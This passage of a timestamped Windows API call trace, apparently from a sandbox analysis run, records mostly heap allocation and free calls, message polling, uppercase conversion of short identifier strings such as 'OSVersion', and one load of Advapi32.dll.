lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.851] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.851] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.851] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.851] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.851] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.852] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.852] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.852] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.852] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.852] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.853] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.853] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0262.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.854] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.854] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.854] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.855] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.856] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0262.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.856] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.857] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.857] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.857] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.857] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.858] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.858] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.858] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.859] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.859] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0262.859] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.859] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.859] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.860] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.860] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.861] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0262.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.861] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.862] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.862] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.862] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0262.863] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0262.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.864] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: 